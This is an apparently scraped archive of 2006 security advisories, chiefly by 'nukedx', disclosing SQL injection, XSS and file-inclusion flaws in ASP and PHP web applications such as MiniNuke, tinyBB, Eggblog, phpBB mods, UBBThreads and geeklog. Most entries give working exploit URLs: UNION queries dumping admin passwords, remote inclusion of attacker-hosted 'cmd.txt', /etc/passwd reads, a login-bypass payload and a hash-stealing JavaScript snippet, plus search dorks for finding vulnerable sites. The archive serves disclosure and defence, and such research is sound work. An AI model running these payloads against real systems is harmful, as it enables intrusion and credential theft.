~ [EMAIL PROTECTED] ~ #e-c-h-o @irc.dal.net --- Contact: Ahmad Muammar W.K || echo|staff || y3dips[at]echo[dot]or[dot]id Homepage: http://y3dips.echo.or.id/ Blogs : http://y3d1ps.blogspot.com/ [ EOF ] --
Advisory: MiniNuke v2.x Multiple Remote Vulnerabilities
Dökümanlar »» Döküman oku --Security Report-- Advisory: MiniNuke v2.x Multiple Remote Vulnerabilities --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 27/05/06 03:16 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: MiniNuke (http://www.miniex.net/) (http://www.mini-nuke.info/) Version: 2.3 and prior versions must be affected. About: Via this method remote attacker can inject arbitrary SQL query to Your_Account.asp. The problem is that yas_1,yas_2 and yas_3 parameters did not sanitized properly before using them on SQL query.This can be caused to remote attacker could change the SQL query line and change his rights on MiniNuke. Vulnerable codes can be found at lines 39-79.. -Code/3979- yas = Request.Form(yas_1) . Request.Form(yas_2) . Request.Form(yas_3) ... ... ... Connection.Execute(UPDATE MEMBERS SET yas = 'yas' WHERE uye_id = Session(Uye_ID)) -Code/3979- Fixing this vulnerability is so easy change the line 39 to this. -Fixed/39- yas = duz(Request.Form(yas_1)) . duz(Request.Form(yas_2)) . duz(Request.Form(yas_3)) -Fixed/39- Another SQL injection in Your_Account.asp is that change theme for user, theme parameter did not sanitized properly before using it on SQL query. Vulnerable code can be found at line 229.. -Code/229- Connection.Execute(UPDATE MEMBERS SET u_theme='Request.Form(theme)' WHERE uye_id = Session(Uye_ID)) -Code/229- Fixing this vulnerability is so easy change the line to this -Fixed/229- fixedtheme = duz(Request.Form(theme)) Connection.Execute(UPDATE MEMBERS SET u_theme='fixedtheme' WHERE uye_id = Session(Uye_ID)) -Fixed/229- duz() function is special for MiniNuke it cleans the malicious characters on based variable. Second problem is on membership.asp.The security code is made as text format so it can be easily readable by remote attacker, and can be used for mass-register so mass-register can make D.o.S for MiniNuke. Third problem is on enter.asp the gguvenlik and guvenlik parameters used in login can be changeable by remote attacker, this can be cause remote attacker makes a dictionary-attack to specified user. Level: Critical Solution: Given --- HowExample: POST - http://[site]/mndir/enter.asp?gguvenlik=1guvenlik=1kuladi=victimpassword=pass With this example remote attacker could make dictionary attack for getting victim's password. POST - http://[site]/mndir/Your_Account.asp?op=RegThemetheme=default',seviye='1 And other example for SQL injection in yas params like this. Login to your account on MiniNuke go to /Your_Account.asp?op=UpdateProfile and open the source code of page find yas_3 and change value like YEAR',seviye='1 and edit source correctly dont forgot to edit Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=31 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=31
Advisory: ASPBB = 0.52 (perform_search.asp) XSS vulnerability
--Security Report-- Advisory: ASPBB = 0.52 (perform_search.asp) XSS vulnerability --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 27/05/06 04:26 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: ASPBB (www.aspbb.org) Version: 0.52 and prior versions must be affected. About: Via this method remote attacker can make malicious links for clicking and when victim clicks this links victim's browser would be inject with XSS. Level: Harmless --- HowExample: GET - http://[site]/perform_search.asp?search=;[XSS] EXAMPLE - http://[site]/perform_search.asp?search=;scriptalert('X');/script --- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply.
Advisory: tinyBB = 0.3 Multiple Remote Vulnerabilities.
--Security Report-- Advisory: tinyBB = 0.3 Multiple Remote Vulnerabilities. --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 27/05/06 05:37 AM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: Epicdesigns (http://www.epicdesigns.co.uk/) Version: 0.3 and prior versions must be affected. About: Via this methods remote attacker can include arbitrary files to tinyBB.tinybb_footers variable in footers.php did not sanitized before using it.You can find vulnerable code in footers.php at line 3 -Source in footers.php- 3: if (strlen($tinybb_footers) 0) { require_once($tinybb_footers); } -End of source- Fixing this vulnerability so easy turn off register_globals. There is also SQL injection in forgot.php.Parameter $q did not sanitized properly before using it on SQL query. You can find vulnerable codes in forgot.php at lines 3-18. -Source in forgot.php- 3: if (isset($q)) { 4: $sql=SELECT COUNT(*) FROM tinybb_members WHERE username='$q' OR email='$q'; 5: $count = mysql_result(mysql_query($sql),0); . -End of source- Also this can be caused to XSS.You can find vulnerable code in forgot.php at line 19-21 -Source in forgot.php- 19: else { 20:echo pThe query b$q/b could not be . 21: } -End of source- There is another SQL injection in login.php.Parameters username and password did not sanitized properly before using it on SQL query.You can find vulnerable codes in login.php at line 2-8 -Source in login.php- 8: $sql=SELECT count(*) FROM tinybb_members WHERE flag='1' AND username='$username' AND password='$password'; -End of source- I didnt wrote all vulnerabilities on tinyBB there is too many SQL injections and XSS vulnerabilities on this tiny bulletin board. Level: Highly Critical --- HowExample: Succesful exploitation needs allow_url_fopen set to 1 and register_globals on GET - http://[victim]/[tBBPath]/footers.php?tinybb_footers=evilscript EXAMPLE - http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt? If magic_quotes_gpc off remote attacker can include local files too EXAMPLE - http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00 SQL injection on login.php GET - http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*password=nothing --- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=33 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=33 --- Dorks: Powered by tinyBB
Advisory: Enigma Haber = 4.3 Multiple Remote SQL Injection Vulnerabilities
--Security Report-- Advisory: Enigma Haber = 4.3 Multiple Remote SQL Injection Vulnerabilities --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 27/05/06 05:16 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: EnigmaASP (http://www.enigmaasp.net/) Version: 4.3 and prior versions must be affected. About: Via this method remote attacker can inject arbitrary SQL queries to EnigmaHaber.See the examples. Level: Critical --- HowExample: GET - http://[site]/enigmadir/e_mesaj_yaz.asp?id=SQL EXAMPLE - http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0, 0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586 GET - http://[site]/enigmadir/yazdir.asp?hid=SQL GET - http://[site]/enigmadir/yorum.asp?hid=SQL GET - http://[site]/enigmadir/edi_haber.asp?id=SQLtur=1 GET - http://[site]/enigmadir/ara.asp?yo=1ara=SQLko=0k=0d=hide=descay=00yil=00 GET - http://[site]/enigmadir/arsiv.asp?d=hide=desc[SQL]ay=00yil=00e_kad=00 EXAMPLE - http://[site]/enigmadir/arsiv.asp?d=hide=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664ay=00yil=00e_kad=00 GET - http://[site]/enigmadir/haber_devam.asp?id=SQL Examples in the below needs admin rights. GET - http://[site]/enigmadir/admin/y_admin.asp?yid=SQL EXAMPLE - http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+ yonet+where+yonetid=1144927664 GET - http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL GET - http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL GET - http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL GET - http://[site]/enigmadir/admin/kategori_d.asp?o=1kid=SQL GET - http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL GET - http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL GET - http://[site]/enigmadir/admin/admin_sil.asp?id=SQL -- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=34 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
Advisory: [EMAIL PROTECTED] Interactive Web = 0.8x Multiple Remote Vulnerabilities.
--Security Report-- Advisory: [EMAIL PROTECTED] Interactive Web = 0.8x Multiple Remote Vulnerabilities. --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 27/05/06 05:57 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: Facile (http://www.facile-web.it/) Version: 0.8.5 and prior versions must be affected. About: Via this methods remote attacker can include arbitrary files to Facile CMS.Parameter l in p-popupgallery.php did not sanitized before using it.You can find vulnerable code in p-popupgallery.php at line 28 -Source in p-popupgallery.php- 28: include ($l/p-lang-base.php); -End of source- This can be caused to remote attacker include internal and external files to p-popupgallery.php. If magic_quotes_gpc off remote attacker can include internal files. If allow_url_fopen on remote attacker can include external files. This work regardless of any register_globals value.That vulnerability is in 0.8.41 - 0.8.5 All other vulnerabilities works on version 0.8x.. There is another file inclusion vulnerabilities in p-editpage.php and p-editbox.php.The parameter pathfile did not sanitized properly.Remote attacker can include arbitrary local files to these scripts.In php5 remote attacker also include external resources too.This works with register_globals on. Vulnerable codes in both files can be found at lines 20-21. -Sources in both- 20: if(isset($pathfile) is_file($pathfile)){ include($pathfile); -End of source- There is another file inclusion vulnerabilities in themes.All themes are vulnerable to include arbitrary local files. This also be caused to XSS.Parameters mytheme and myskin did not sanitized properly before using them.LFI works with magic_quotes_gpc off. Vulnerable files are: p-themes/lowgraphic/index.inc.php p-themes/classic/index.inc.php p-themes/puzzle/index.inc.php p-themes/simple/index.inc.php p-themes/ciao/index.inc.php Remote attacker also disclose local resources.The parameter lang in index.php did not sanitized properly before using it. This works with magic_quotes_gpc off. Level: Highly Critical --- HowExample: GET - http://[victim]/[FacilePath]/p-popupgallery.php?l=[FILE] EXAMPLE - http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt? EXAMPLE - http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00 GET - http://[victim]/[FacilePath]/p-editbox.php?pathfile=[FILE] EXAMPLE - http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd EXAMPLE - http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php - php5 GET - http://[victim]/[FacilePath]/p-editpage.php?pathfile=[FILE] EXAMPLE - http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd EXAMPLE - http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php - php5 GET - http://[victim]/[FacilePath]/p-themes/THEME/index.inc.php?mytheme=[FILE] EXAMPLE - http://[victim]/[FacilePath]/p-themes/THEME/index.inc.php?mytheme=/etc/passwd%00 GET - http://[victim]/[FacilePath]/p-themes/THEME/index.inc.php?mytheme=XSSmyskin=XSS GET - http://[victim]/[FacilePath]/index.php?mn=0pg=0lang=[FILE] EXAMPLE - http://[victim]/[FacilePath]/index.php?mn=0pg=0lang=/etc/passwd%00 --- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. --- --- Exploit: http://www.nukedx.com/?getxpl=35 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=35 --- Dorks: Powered by [EMAIL PROTECTED] Interactive Web
Advisory: Eggblog = 3.x Multiple Remote Vulnerabilities
--Security Report-- Advisory: Eggblog = 3.x Multiple Remote Vulnerabilities --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 27/05/06 06:15 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: Eggblog (http://www.eggblog.net/) Version: 3.0.6 and prior versions must be affected. About: Via this method remote attacker can inject arbitrary SQL queries to Eggblog.This SQL injection works with Eggblog version 3.0.6 and below.The problem is that id parameter id rss/posts.php did not sanitized properly before using it in SQL query.This caused to remote attacker inject arbitrary SQL queries and execute them.This SQL injection needs magic_quotes_gpc off. There is another problem in Eggblog 2.x.In registration member register status did not sanitized properly.This caused to remote attacker register new member as a admin nick and get administration privileges on Eggblog. Level: Critical --- HowExample: GET - http://[site]/[EggBlog]/rss/posts.php?id=SQL EXAMPLE - http://[site]/[EggBlog]/rss/posts.php?id=1'/**/UNION/**/SELECT/**/0,concat('Username:%20',username), concat('Password:%20',password)/**/from/**/eggblog_members/* POST/EXAMPLE - http://[site]/[EggBlog]/home/register.php?username=victimpassword=password[EMAIL PROTECTED]ref= -- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=36 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=36
Advisory: phpBB 2.x (admin/admin_hacks_list.php) Local Inclusion Vulnerability.
--Security Report-- Advisory: phpBB 2.x (admin/admin_hacks_list.php) Local Inclusion Vulnerability. --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 27/05/06 07:37 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: Nivisec (http://www.nivisec.com/) Version: 2.x and prior versions must be affected. About: Via this methods remote attacker can include arbitrary local files to phpBB.board_config[default_lang] and phpEx variable in admin/admin_hacks_list.php did not sanitized properl before using it.You can find vulnerable code in admin_hacks_list.php at lines 30-37 -Source in admin_hacks_list.php- 30: if( !empty($setmodules) ) 31: { 32:include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_admin_hacks_list.' . $phpEx); 33:$filename = basename(__FILE__); 34:$module['General']['Hacks_List'] = $filename; 35: 36:return; 37: } -End of source- Level: Highly Critical --- HowExample: Succesful exploitation register_globals on GET - http://[victim]/[phpBB]/admin/admin_hacks_list.php?setmodules=1board_config[default_lang]=englishphpEx=[FILE] EXAMPLE - http://[victim]/[phpBB]/admin/admin_hacks_list.php?setmodules=1board_config[default_lang]=english phpEx=../../../../../../../../etc/passwd --- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=37 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=37 --- Dorks: Powered by phpBB inurl:hacks_list.php
Advisory: phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability.
--Security Report-- Advisory: phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability. --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 27/05/06 07:49 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: phpBB-Amod (http://www.phpbb-amod.com/) Version: 2.x and prior versions must be affected. About: Via this methods remote attacker can include arbitrary local files to phpBB.phpbb_root_path variable in /language/lang_english/lang_activity.php did not sanitized before using it.You can find vulnerable code in admin_hacks_list.php at line 12 -Source in lang_activity.php- 12: include_once($phpbb_root_path .'language/lang_'. $board_config['default_lang'] .'/lang_activity_char.'. $phpEx); -End of source- If magic_quotes_gpc off remote attacker can include arbitrary internal files by null char (0x00) ending. If allow_url_fopen on remote attacker can include arbitrary external files to lang_activity.php Both requires register_globals on Level: Highly Critical --- HowExample: Succesful exploitation needs register_globals on GET - http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE] EXAMPLE - http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00 Requires magic_quotes_gpc off EXAMPLE - http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt Requires allow_url_fopen on --- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. --- --- Exploit: http://www.nukedx.com/?getxpl=38 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=38 --- Dorks: Powered by phpBB inurl:activity.php
Advisory: ASPSitem = 2.0 Multiple Vulnerabilities.
--Security Report-- Advisory: ASPSitem = 2.0 Multiple Vulnerabilities. --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 27/05/06 08:26 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: ASPSitem (http://www.aspsitem.com) Version: 2.0 and prior versions must be affected. About: Via this method remote attacker can inject arbitrary SQL queries to bid parameter in Anket.asp. Remote attacker also can read others private messages.The parameter id in Hesabim.asp did not sanitized properly for checking the owner status of private message. Level: Critical --- HowExample: SQL injection - GET - http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL] EXAMPLE - http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20 id%20like%201 with this example remote attacker can leak userid 1's login information from database. Read others private messages - GET/EXAMPLE - http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=okuid=1uye=yourusername --- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. * 27/05/2006: Vendor already released patch for SQL injection you can find it here: http://www.aspsitem.com/Forum.asp?forum=okumsgid=44710 -- Exploit: http://www.nukedx.com/?getxpl=39 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=39 --- Dorks: Teşekkür ASPSitem
Advisory: UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities.
--Security Report-- Advisory: UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities. --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 27/05/06 09:44 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: Infopop (http://www.infopop.com/) Version: 5.x and 6.x also prior versions must be affected. About: Via this methods remote attacker can include arbitrary files to UBBThreads.The thispath and configdir in ubbt.inc.php did not sanitized before using it.You can find vulnerable code in ubbt.inc.php at lines 23-42 -Source in ubbt.inc.php- 23: if (!$configdir) { 24:$configdir = $thispath; 25:} 26: 27: // -- 28: // In case register globals are on we need to protect a few variables 29: if ( 30: isset($HTTP_GET_VARS['thispath']) 31: || isset($HTTP_POST_VARS['thispath']) 32: || isset($HTTP_COOKIE_VARS['thispath']) 33: || isset($HTTP_POST_FILES['thispath']) 34: || isset($HTTP_GET_VARS['configdir']) 35: || isset($HTTP_POST_VARS['configdir']) 36: || isset($HTTP_COOKIE_VARS['configdir']) 37: || isset($HTTP_POST_FILES['configdir']) ) 38: { 39: exit; 40: } 41: 42: include($configdir/config.inc.php); -End of source- So if register_globals on remote attacker could inject arbitrary variable by GLOBALS[thispath]. Also if php = 4.1.0 there is no $HTTP_* tags so remote attacker can use thispath in QueryString.This works on version 6.x For version 5.x there is no variable check in ubbt.inc.php so remote attacker can inject thispath to QueryString and include external and internal files. Including internal files requires that magic_quotes_gpc off. There is another inclusion vulnerability in includepollresults.php for version 6.x. Parameters config[cookieprefix] and w3t_language did not sanitized properly before using them.So it lets remote attacker can include arbitrary internal files. You can find vulnerable code in includepollresults.php at lines 24 -Source code in includepollresults.php- 24: require (languages/${$config['cookieprefix'].w3t_language}/includepollresults.php); -End of source- There is also XSS vulnerability in all pages.If debug parameter sent by QueryString it lets remote attacker make a malicious links for clicking and execute arbitrary HTML/JS/VBS etc.. codes in victim's browser. Level: Highly Critical --- HowExample: Succesful exploitation register_globals on Version 6.x GET - http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=w3t_language=[FILE] EXAMPLE - http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=w3t_language=../../../../../etc/passwd%00 GET - http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE] EXAMPLE - http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt? EXAMPLE - http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00 If php version 4.1.0 or UBB version = 5.x GET - http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE] EXAMPLE - http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt? EXAMPLE - http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00 XSS: GET - http://[site]/[ubbpath]/index.php?debug=[XSS] EXAMPLE - http://[site]/[ubbpath]/index.php?debug=scriptalert();/script --- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=40 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=40 --- Dorks: UBB.threadsâ¢
Advisory: Blend Portal = 1.2.0 for phpBB 2.x (blend_data/blend_common.php) File Inclusion Vulnerability
--Security Report-- Advisory: Blend Portal = 1.2.0 for phpBB 2.x (blend_data/blend_common.php) File Inclusion Vulnerability. --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 28/05/06 07:52 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: phpbb-portal (http://www.phpbb-portal.com/) Version: 1.2.0 and prior versions must be affected. About: Via this methods remote attacker can include arbitrary internal/external files to phpBB. phpbb_root_path variable in /blend_data/blend_common.php did not sanitized properly before using it.You can find vulnerable code in blend_common.php at lines 74-77 -Source in blend_common.php- 74: else 75: { 76: include_once($phpbb_root_path . BLEND_DATA_PATH . BLEND_CACHE_PATH .'config.'. $phpEx); 77: } -End of source- Level: Highly Critical --- HowExample: Succesful exploitation needs register_globals on allow url_fopen on GET - http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE] EXAMPLE - http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt? EXAMPLE - http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=/etc/passwd%00 --- Timeline: * 28/05/2006: Vulnerability found. * 28/05/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=41 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=41
VARIOMAT(advanced cms tool)SQL injection/XSS
=== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com nono225-mHOn-rageh-LoverHacker Brh-LiNuX_rOOt-BoNy_m-rootshill === Example:- /news.php?mode=singleview=actitem=76subcat=[SQL] /news.php?mode=singleview=actitem=76subcat=[XSS] === Email: [EMAIL PROTECTED]
Xss exploit in Photoalbum BW v1.3
Xss exploit in Photoalbum BW v1.3 forum type : Photoalbum BW v1.3 bug found by : black-code sweet-devil team : site-down type : Xss exploit : http://www.example.com/superalbum/index.php?pic='scriptalert(10)/script path to admin login: ### emails: [EMAIL PROTECTED][EMAIL PROTECTED] ### All my respect to our friends , lezr.com , g123g.net done .. peace
[KAPDA::#45] - geeklog multiple vulnerabilities
KAPDA New advisory Vendor: http://www.geeklog.net Bugs: Path Disclosure, XSS, SQL Injection (Authentication bypass) Vulnerable Version: geeklog-1.4.0sr2(prior versions also may be affected) Exploitation: Remote with browser Description: geeklog is a freely available PHP-based web content management system that uses a MySQL database. Vulnerabilities: --Path Disclosure-- Reason: direct access to special files that generates php error with installation path information. Several files are vulnerable in this case. Example: http://example.com/geeklog/layout/professional/functions.php http://example.com/geeklog/getimage.php?mode=showimage=dd --XSS-- Reason: the script doesn't properly validate user supplied input in getimage.php that result in xss vulnerability Example: http://example.com/geeklog/getimage.php?mode=showimage=./IMG%20SRC=JaVaScRiPt:alert(document.cookie) Code Snippets: /getimage.php line#100-103 $display = COM_errorLog('File, ' . $downloader-getPath() . $image . ', was not found in getimage.php'); if ($mode == 'show') { echo COM_siteHeader ('menu') . $display . COM_siteFooter (); --SQL Injection (Authentication bypass)-- Reason: again the script doesn't properly validate user supplied input in /admin/auth.inc.php that may result in Authentication bypass using sql injection to gain admin privileges. Code Snippets: /admin/auth.inc.php line#44-45 if (!empty ($_POST['loginname']) !empty ($_POST['passwd'])) { $status = SEC_authenticate ($_POST['loginname'], $_POST['passwd'], $uid); ../system/lib-security.php line#697-732 function SEC_authenticate($username, $password, $uid) { global $_TABLES, $LANG01, $_CONF; $result = DB_query( SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = '')) ); $tmp = mysql_errno(); $nrows = DB_numRows( $result ); if(( $tmp == 0 ) ( $nrows == 1 )) { $U = DB_fetchArray( $result ); $uid = $U['uid']; if ($U['status'] == USER_ACCOUNT_DISABLED) { return USER_ACCOUNT_DISABLED; // banned, jump to here to save an md5 calc. } elseif ($U['passwd'] != md5( $password )) { return -1; // failed login } elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) { //awaiting approval, jump to msg. echo COM_refresh($_CONF['site_url'] . '/users.php?msg=70'); exit; } elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) { // Awaiting user activation, activate: DB_change($_TABLES['users'],'status',USER_ACCOUNT_ACTIVE,'username',$username); return USER_ACCOUNT_ACTIVE; } else { return $U['status']; // just return their status } } else { $tmp = $LANG01[32] . : ' . $username . '; COM_errorLog( $tmp, 1 ); return -1; } } as you see there is no input validation here so when magic_quotes_gpc=off you can bypass login Authentication. Example: /admin/moderation.php POST data: loginname: me' union select 3,'3d2172418ce305c7d16d4b05597c6a59','email',2 from gl_users where username='Admin passwd: 2 Solution: Version geeklog-1.4.0sr3 is available now. http://www.geeklog.net/article.php/geeklog-1.4.0sr3 Original Advisory: http://kapda.ir/advisory-336.html Credit: Discovered released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran [http://www.KAPDA.ir] __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
UBBThreads 5.x,6.x md5 hash disclosure
UBBThreads 5.x,6.x md5 hash disclosure --- Using XSS such as the one reported earlier: http://[site]/[ubbpath]/index.php?debug=[xss] will allow you to inject javascript and steal MD5 Hashes from: http://[site]/[ubbpath]/editbasic.php The MD5 is automatically included in the source of the html for a logged on user, the field type is password so it appears as ** - although the source contains the MD5. Below is an example snippet of the html source: input type=password name=ChosenPassword value=81dc9bdb52d04dc20036dbd8313ed055 class=formboxes / br / br / Verify Password br / input type = password name = Verify value = 81dc9bdb52d04dc20036dbd8313ed055 class=formboxes / A malicious attacker could force a user to perform a GET request to the xss containing js to steal their hash. The below javascript would grab the MD5 using the XMLHttpRequest object. str is defined as the ResponseText from XMLHttpRequest() function findmd5(str){ var s = str.indexOf('name=ChosenPassword value='); var e = str.indexOf(' class=f', s); return str.substring(s+29, e); } - Discovered By: splices www.securident.com
RE: Advisory: Blend Portal = 1.2.0 for phpBB 2.x(blend_data/blend_common.php) File Inclusion Vulnerability
I have addressed this issue the one reported about the Activity Mod Plus. Below is a link to patches for both. Thanks. http://phpbb-tweaks.com/topics.html-p-17623#17623 Thanks For Your E-Mail aUsTiN Staff For an interactinve phpBB Support board http://phpbb-tweaks.com/ For a phpBB based portal support http://phpbb-portal.com/ For a phpBB based gaming system support http://phpbb-amod.com/ http://aUsTiN-Inc.net/ From: Mustafa Can Bjorn IPEKCI [EMAIL PROTECTED] To: [EMAIL PROTECTED], full-disclosure@lists.grok.org.uk,bugtraq@securityfocus.com, [EMAIL PROTECTED] Subject: Advisory: Blend Portal = 1.2.0 for phpBB 2.x(blend_data/blend_common.php) File Inclusion Vulnerability Date: Sun, 28 May 2006 20:46:39 +0300 MIME-Version: 1.0 Received: from king.anope.net ([67.15.88.53]) by bay0-mc10-f9.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.1830); Sun, 28 May 2006 10:54:44 -0700 Received: (qmail 1602 invoked from network); 28 May 2006 20:46:45 +0300 Received: from localhost (@127.0.0.1) by localhost with SMTP; 28 May 2006 20:46:44 +0300 Received: from 85.103.237.117 ([85.103.237.117]) by webmail.nukedx.com(Horde MIME library) with HTTP; Sun, 28 May 2006 20:46:39 +0300 X-Message-Info: LsUYwwHHNt3IkD50dWx1Zh4q3nci+v36uLgoVBpjm50= User-Agent: Internet Messaging Program (IMP) H3 (4.1) Return-Path: [EMAIL PROTECTED] X-OriginalArrivalTime: 28 May 2006 17:54:44.0992 (UTC) FILETIME=[CDAF6800:01C6827F] --Security Report-- Advisory: Blend Portal = 1.2.0 for phpBB 2.x (blend_data/blend_common.php) File Inclusion Vulnerability. --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 28/05/06 07:52 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: phpbb-portal (http://www.phpbb-portal.com/) Version: 1.2.0 and prior versions must be affected. About: Via this methods remote attacker can include arbitrary internal/external files to phpBB. phpbb_root_path variable in /blend_data/blend_common.php did not sanitized properly before using it.You can find vulnerable code in blend_common.php at lines 74-77 -Source in blend_common.php- 74: else 75: { 76: include_once($phpbb_root_path . BLEND_DATA_PATH . BLEND_CACHE_PATH .'config.'. $phpEx); 77: } -End of source- Level: Highly Critical --- HowExample: Succesful exploitation needs register_globals on allow url_fopen on GET - http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE] EXAMPLE - http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt? EXAMPLE - http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=/etc/passwd%00 --- Timeline: * 28/05/2006: 